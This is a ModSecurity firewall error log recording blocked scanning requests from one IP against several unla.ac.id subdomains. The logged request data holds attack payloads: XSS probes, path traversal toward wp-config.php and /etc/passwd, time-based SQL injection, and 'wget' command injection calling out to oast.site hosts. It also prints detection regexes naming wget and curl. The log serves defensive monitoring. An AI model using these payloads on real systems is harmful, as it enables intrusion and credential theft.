[Tue Aug 29 11:48:57.437096 2023] [:error] [pid 2437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAmFnzcAAAAx"]
[Tue Aug 29 11:48:57.439752 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAmHd44AAAAz"]
[Tue Aug 29 11:48:57.442134 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAkGCZcAAAAE"]
[Tue Aug 29 11:48:57.444393 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAj12JUAAAAa"]
[Tue Aug 29 11:48:57.446994 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAlQ3ssAAAAw"]
[Tue Aug 29 11:48:57.450958 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAmIbKoAAAAo"]
[Tue Aug 29 11:48:57.451280 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAlUlf4AAAA0"]
[Tue Aug 29 11:48:57.453189 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAlkwikAAAAO"]
[Tue Aug 29 11:48:57.460755 2023] [:error] [pid 2437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAmFnzgAAAAx"]
[Tue Aug 29 11:48:57.464209 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAkrz-wAAAAC"]
[Tue Aug 29 11:48:57.474589 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAj12JYAAAAa"]
[Tue Aug 29 11:48:57.494313 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAkle1gAAAAD"]
[Tue Aug 29 11:48:58.362928 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14usCo-f0AAAlo00MAAAAJ"]
[Tue Aug 29 11:48:58.365622 2023] [:error] [pid 2427] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14usCo-f0AAAl74uEAAAAj"]
[Tue Aug 29 11:48:58.371993 2023] [:error] [pid 2437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14usCo-f0AAAmFnzkAAAAx"]
[Tue Aug 29 11:48:58.384421 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14usCo-f0AAAjtdC0AAAAX"]
[Tue Aug 29 11:48:58.389648 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14usCo-f0AAAj12JgAAAAa"]
[Tue Aug 29 11:48:59.377180 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAfWN9YAAAAL"]
[Tue Aug 29 11:48:59.378472 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAlkwisAAAAO"]
[Tue Aug 29 11:48:59.382994 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAlo00UAAAAJ"]
[Tue Aug 29 11:48:59.393645 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAlL7DoAAAAq"]
[Tue Aug 29 11:48:59.431999 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAkksQIAAAAA"]
[Tue Aug 29 11:48:59.434834 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14u8Co-f0AAAmHd5IAAAAz"]
[Tue Aug 29 11:49:02.386918 2023] [:error] [pid 2441] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gguyszamffczth.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAmJYWEAAAAP"]
[Tue Aug 29 11:49:02.389358 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gty4z31w6ws967.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAlL7EEAAAAq"]
[Tue Aug 29 11:49:02.389910 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26g5rsthfdrow8st.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAmIbLQAAAAo"]
[Tue Aug 29 11:49:02.417705 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gpgfr4okmtoi9d.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAk2KZsAAAAb"]
[Tue Aug 29 11:49:02.426448 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gdngyufi7cdqh3.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAlFH8EAAAAk"]
[Tue Aug 29 11:49:03.519894 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gexryacpwj98b1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14v8Co-f0AAAhujDsAAAAr"]
[Tue Aug 29 11:49:04.452428 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAfWN9wAAAAL"]
[Tue Aug 29 11:49:04.458939 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAlV8DgAAAA1"]
[Tue Aug 29 11:49:04.465313 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAk7QMEAAAAi"]
[Tue Aug 29 11:49:04.466283 2023] [:error] [pid 2442] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wMCo-f0AAAmKK@EAAAAI"]
[Tue Aug 29 11:49:04.477281 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAlQ3tgAAAAw"]
